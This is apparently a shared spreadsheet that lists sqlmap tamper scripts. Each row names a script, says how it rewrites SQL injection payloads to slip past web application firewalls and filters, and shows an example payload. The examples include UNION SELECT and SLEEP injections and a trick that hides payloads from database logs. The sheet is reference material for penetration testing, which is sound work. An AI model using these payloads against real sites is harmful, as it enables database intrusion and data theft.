Sqlmap tamper scripts
 Share
The version of the browser you are using is no longer supported. Please upgrade to a supported browser.Dismiss

View only
 
ABC
1
NameDescriptionExample
2
apostrophemask.pyReplaces apostrophe character with its UTF-8 full width counterpart1 AND %EF%BC%871%EF%BC%87=%EF%BC%871'
3
apostrophenullencode.pyReplaces apostrophe character with its illegal double unicode counterpart1 AND %271%27=%271'
4
appendnullbyte.pyAppends encoded NULL byte character at the end of payload1 AND 1=1'
5
base64encode.pyBase64 all characters in a given payloadMScgQU5EIFNMRUVQKDUpIw=='
6
between.pyReplaces greater than operator ('>') with 'NOT BETWEEN 0 AND #'1 AND A NOT BETWEEN 0 AND B--'
7
bluecoat.py
Replaces space character after SQL statement with a valid random blank character.Afterwards replace character = with LIKE operator
SELECT%09id FROM users where id LIKE 1'
8
chardoubleencode.pyDouble url-encodes all characters in a given payload (not processing already encoded)
%2553%2545%254C%2545%2543%2554%2520%2
546%2549%2545%254C%2544%2520%2546%2552
%254F%254D%2520%2554%2541%2542%254C%2545'
9
commalesslimit.pyReplaces instances like 'LIMIT M, N' with 'LIMIT N OFFSET M''LIMIT 3 OFFSET 2''
10
commalessmid.pyReplaces instances like 'MID(A, B, C)' with 'MID(A FROM B FOR C)'MID(VERSION() FROM 1 FOR 1)'
11
concat2concatws.pyReplaces instances like 'CONCAT(A, B)' with 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)'CONCAT_WS(MID(CHAR(0),0,0),1,2)'
12
charencode.pyUrl-encodes all characters in a given payload (not processing already encoded)
%53%45%4C%45%43%54%20%46%49%45%4C%4
4%20%46%52%4F%4D%20%54%41%42%4C%45'
13
charunicodeencode.pyUnicode-url-encodes non-encoded characters in a given payload (not processing already encoded)
%u0053%u0045%u004C%u0045%u0043%u0054%u
0020%u0046%u0049%u0045%u004C%u0044%u002
0%u0046%u0052%u004F%u004D%u0020%u0054%
u0041%u0042%u004C%u0045'
14
equaltolike.pyReplaces all occurances of operator equal ('=') with operator 'LIKE'SELECT * FROM users WHERE id LIKE 1'
15
escapequotes.pySlash escape quotes (' and ")1\\\\" AND SLEEP(5)#'
16
greatest.pyReplaces greater than operator ('>') with 'GREATEST' counterpart1 AND GREATEST(A,B+1)=A'
17
halfversionedmorekeywords.py
Adds versioned MySQL comment before each keyword
"value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT
(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(
/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR
(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0N
ULL#/*!0AND 'QDWa'='QDWa"
18
ifnull2ifisnull.pyReplaces instances like 'IFNULL(A, B)' with 'IF(ISNULL(A), B, A)'IF(ISNULL(1),2,1)'
19
modsecurityversioned.pyEmbraces complete query with versioned comment1 /*!30874AND 2>1*/--'
20
modsecurityzeroversioned.py
Embraces complete query with zero-versioned comment1 /*!00000AND 2>1*/--'
21
multiplespaces.pyAdds multiple spaces around SQL keywords1 UNION SELECT foobar'
22
nonrecursivereplacement.py
Replaces predefined SQL keywords with representations suitable for replacement (e.g. .replace("SELECT", "")) filters1 UNIOUNIONN SELESELECTCT 2--'
23
percentage.pyAdds a percentage sign ('%') infront of each character%S%E%L%E%C%T %F%I%E%L%D %F%R%O%M
%T%A%B%L%E'
24
overlongutf8.pyConverts all characters in a given payload (not processing already encoded)
SELECT%C0%AAFIELD%C0%AAFROM%C0%AAT
ABLE%C0%AAWHERE%C0%AA2%C0%BE1'
25
randomcase.pyReplaces each keyword character with random case valueINseRt'
26
randomcomments.pyAdd random comments to SQL keywordsI/**/N/**/SERT'
27
securesphere.pyAppends special crafted string"1 AND 1=1 and '0having'='0having'"
28
sp_password.pyAppends 'sp_password' to the end of the payload for automatic obfuscation from DBMS logs1 AND 9227=9227-- sp_password'
29
space2comment.pyReplaces space character (' ') with comments '/**/'SELECT/**/id/**/FROM/**/users'
30
space2dash.pyReplaces space character (' ') with a dash comment ('--') followed by a random string and a new line ('\n')1--nVNaVoPYeva%0AAND--ngNvzqu%0A9227=9227'
31
space2hash.pyReplaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\n')1%23nVNaVoPYeva%0AAND%23ngNvzqu%0A9227
=9227'
32
space2morehash.pyReplaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\n')1%23ngNvzqu%0AAND%23nVNaVoPYeva%0A%23
lujYFWfv%0A9227=9227'
33
space2mssqlblank.pyReplaces space character (' ') with a random blank character from a valid set of alternate charactersSELECT%0Eid%0DFROM%07users'
34
space2mssqlhash.pyReplaces space character (' ') with a pound character ('#') followed by a new line ('\n')1%23%0AAND%23%0A9227=9227'
35
space2mysqlblank.pyReplaces space character (' ') with a random blank character from a valid set of alternate charactersSELECT%A0id%0BFROM%0Cusers'
36
space2mysqldash.pyReplaces space character (' ') with a dash comment ('--') followed by a new line ('\n')1--%0AAND--%0A9227=9227'
37
space2plus.pyReplaces space character (' ') with plus ('+')SELECT+id+FROM+users'
38
space2randomblank.pyReplaces space character (' ') with a random blank character from a valid set of alternate charactersSELECT%0Did%0DFROM%0Ausers'
39
symboliclogical.pyReplaces AND and OR logical operators with their symbolic counterparts (&& and ||)"1 %26%26 '1'='1"
40
unionalltounion.pyReplaces UNION ALL SELECT with UNION SELECT-1 UNION SELECT'
41
unmagicquotes.pyReplaces quote character (') with a multi-byte combo %bf%27 together with generic comment at the end (to make it work)1%bf%27 AND 1=1-- '
42
uppercase.pyReplaces each keyword character with upper case valueINSERT'
43
varnish.pyAppend a HTTP header 'X-originating-IP'
http://h30499.www3.hp.com/t5/Fortify-Application-S
ecurity/Bypassing-web-application-firewalls-using-HT
TP-headers/ba-p/6418366
44
versionedkeywords.pyEncloses each non-function keyword with versioned MySQL comment
1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL
*/,CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST
(CURRENT_USER()/*!AS*//*!CHAR*/),CHAR(32)),CH
AR(58,100,114,117,58))#
45
versionedmorekeywords.pyEncloses each keyword with versioned MySQL comment
1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL
*/,/*!CONCAT*/(/*!CHAR*/(58,122,114,115,58),/*!IFN
ULL*/(CAST(/*!CURRENT_USER*/()/*!AS*//*!CHAR*
/),/*!CHAR*/(32)),/*!CHAR*/(58,115,114,121,58))#'
46
xforwardedfor.pyAppend a fake HTTP header 'X-Forwarded-For' headers["X-Forwarded-For"]'
47
48
Sourcehttp://www.forkbombers.com/2016/07/sqlmap-tamper-scripts-update.html
49
This sheet is prepared for @bugbsurveys twitter account, depends on the above source.
Loading...